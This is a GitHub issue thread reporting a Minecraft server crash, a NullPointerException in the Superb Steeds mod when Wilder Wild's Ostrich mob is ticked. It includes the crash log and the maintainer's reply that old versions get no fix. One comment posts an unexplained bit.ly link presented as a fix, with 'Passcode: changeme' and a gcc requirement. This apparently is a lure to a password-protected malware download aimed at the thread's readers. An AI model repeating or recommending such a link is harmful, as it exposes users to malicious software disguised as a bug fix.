### ISSUE TITLE
Game crashes when the 'Ostrich' mob  (a horse-like mob) is loaded from Wilder Wild mod

### ISSUE THREAD

**Issue by Gl0wstone** [MoriyaShiine/superb-steeds#6]
### Confirmations

- [X] I can verify that I am running the mod on the latest possible Minecraft version.
- [X] I can verify that the issue I am reporting exists on the latest possible Mod version.

### Mod version (NOT Minecraft version)

1.20-4

### A description of the issue

We have a 1.20.1 server, where I'm reproducing a game crash, when both **Wilder Wild** mod and **Superb Steeds** is running.  Wilder Wild includes an Ostrich mob, and it has horse-like properties.  It seems like Super Steeds doesn't like that.

Fabric Mod Versions
```
`superbsteeds: Superb Steeds 1.20-4
			cardinal-components-base: Cardinal Components API (base) 5.2.2
			cardinal-components-entity: Cardinal Components API (entities) 5.2.2`
`wilderwild: Wilder Wild 2.4.6-mc1.20.1
			frozenlib: FrozenLib 1.8-mc1.20.1
			reach-entity-attributes: Reach Entity Attributes 2.4.0`
```

Error log below:

```
`Time: 2024-09-05 09:00:49
Description: Ticking entity

java.lang.NullPointerException: Cannot invoke "net.minecraft.class_1324.method_26837(net.minecraft.class_1322)" because the return value of "net.minecraft.class_1496.method_5996(net.minecraft.class_1320)" is null
	at moriyashiine.superbsteeds.common.component.entity.HorseAttributesComponent.incrementJump(HorseAttributesComponent.java:113)
	at moriyashiine.superbsteeds.common.component.entity.HorseAttributesComponent.serverTick(HorseAttributesComponent.java:61)
	at dev.onyxstudios.cca._generated_.GeneratedComponentContainer_EntityImpl_Ostrich_781c1fbc.tickServerComponents(Unknown Source)
	at net.minecraft.class_3218.handler$bkm000$cardinal-components-entity$tick(class_3218.java:4237)
	at net.minecraft.class_3218.method_18762(class_3218.java:739)
	at net.minecraft.class_1937.method_18472(class_1937.java:480)
	at net.minecraft.class_3218.method_31420(class_3218.java:385)
	at net.minecraft.class_5574.method_31791(class_5574.java:54)
	at net.minecraft.class_3218.method_18765(class_3218.java:353)
	at net.minecraft.server.MinecraftServer.method_3813(MinecraftServer.java:897)
	at net.minecraft.server.MinecraftServer.method_3748(MinecraftServer.java:824)
	at net.minecraft.class_1132.method_3748(class_1132.java:105)
	at net.minecraft.server.MinecraftServer.method_29741(MinecraftServer.java:671)
	at net.minecraft.server.MinecraftServer.method_29739(MinecraftServer.java:265)
	at java.base/java.lang.Thread.run(Thread.java:842)


A detailed walkthrough of the error, its code path and all known details is as follows:
---------------------------------------------------------------------------------------

-- Head --
Thread: Server thread
Stacktrace:
	at moriyashiine.superbsteeds.common.component.entity.HorseAttributesComponent.incrementJump(HorseAttributesComponent.java:113)
	at moriyashiine.superbsteeds.common.component.entity.HorseAttributesComponent.serverTick(HorseAttributesComponent.java:61)
	at dev.onyxstudios.cca._generated_.GeneratedComponentContainer_EntityImpl_Ostrich_781c1fbc.tickServerComponents(Unknown Source)
	at net.minecraft.class_3218.handler$bkm000$cardinal-components-entity$tick(class_3218.java:4237)
	at net.minecraft.class_3218.method_18762(class_3218.java:739)
	at net.minecraft.class_1937.method_18472(class_1937.java:480)
	at net.minecraft.class_3218.method_31420(class_3218.java:385)
	at net.minecraft.class_5574.method_31791(class_5574.java:54)
	at net.minecraft.class_3218.method_18765(class_3218.java:353)

-- Entity being ticked --
Details:
	Entity Type: wilderwild:ostrich (net.frozenblock.wilderwild.entity.Ostrich)
	Entity ID: 3245
	Entity Name: Ostrich
	Entity's Exact location: 139.50, 69.00, -25.50
	Entity's Block location: World: (139,69,-26), Section: (at 11,5,6 in 8,4,-2; chunk contains blocks 128,-64,-32 to 143,319,-17), Region: (0,-1; contains chunks 0,-32 to 31,-1, blocks 0,-64,-512 to 511,319,-1)
	Entity's Momentum: 0.00, -0.08, 0.00
	Entity's Passengers: []
	Entity's Vehicle: null
Stacktrace:
	at net.minecraft.class_1937.method_18472(class_1937.java:480)
	at net.minecraft.class_3218.method_31420(class_3218.java:385)
	at net.minecraft.class_5574.method_31791(class_5574.java:54)
	at net.minecraft.class_3218.method_18765(class_3218.java:353)
	at net.minecraft.server.MinecraftServer.method_3813(MinecraftServer.java:897)
	at net.minecraft.server.MinecraftServer.method_3748(MinecraftServer.java:824)
	at net.minecraft.class_1132.method_3748(class_1132.java:105)
	at net.minecraft.server.MinecraftServer.method_29741(MinecraftServer.java:671)
	at net.minecraft.server.MinecraftServer.method_29739(MinecraftServer.java:265)
	at java.base/java.lang.Thread.run(Thread.java:842)`


`-- System Details --
Details:
	Minecraft Version: 1.20.1
	Minecraft Version ID: 1.20.1
	Operating System: Mac OS X (aarch64) version 14.5
	Java Version: 17.0.9, Oracle Corporation
	Java VM Version: Java HotSpot(TM) 64-Bit Server VM (mixed mode, sharing), Oracle Corporation
	Memory: 501700072 bytes (478 MiB) / 4005560320 bytes (3820 MiB) up to 8455716864 bytes (8064 MiB)
	CPUs: 16
	Processor Vendor: Apple Inc.
	Processor Name: Apple M3 Max
	Identifier: Apple Inc. Family 0x72015832 Model 0 Stepping 0
	Microarchitecture: unknown
	Frequency (GHz): -0.00
	Number of physical packages: 1
	Number of physical CPUs: 16
	Number of logical CPUs: 16
	Graphics card #0 name: Apple M3 Max
	Graphics card #0 vendor: Apple (0x106b)
	Graphics card #0 VRAM (MB): 0.00
	Graphics card #0 deviceId: unknown
	Graphics card #0 versionInfo: unknown
	Memory slot #0 capacity (MB): 0.00
	Memory slot #0 clockSpeed (GHz): 0.00
	Memory slot #0 type: unknown
	Virtual memory max (MB): 65536.00
	Virtual memory used (MB): 39285.00
	Swap memory total (MB): 0.00
	Swap memory used (MB): 0.00
	JVM Flags: 2 total; -Xms512m -Xmx8064m`

```
Ostrich's spawn in Savannah biomes.  Description from the mod:
> > Ostrich
> A feathery new mob with a passion for fighting.
> > Is tamed the same way as Horses, but takes a bit longer due to their feistier nature.
> > Instead of charging a jump while being ridden it will attack with its beak, the strength depending on how high the meter was charged.
> > Can be bred with Bushes.
> > If attacked and not tamed, will chase after its attacker and peck them to death.
> > If they are tamed, this behavior will only apply to non-player mobs.
> > Will call other Ostriches for backup, like Wolves and Crabs.
> > While provoked, cannot be ridden or fed unless it's already tamed.
> > If tamed, can be fed or ridden while provoked to calm down.
> 

### Log or crash report

https://gist.github.com/Gl0wstone/77a1d9cf7234bdb1aac3ea06be14f8b1

**Comment by afreisz** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by MoriyaShiine** [comment]
Should no longer be an issue in 1.21 since movement and jump attributes are universally applied

**Comment by EnchantedBread** [comment]
what are the chances you could fix this for 1.20 🙏

**Comment by MoriyaShiine** [comment]
Zero, unfortunately. I don't support old versions of my mods
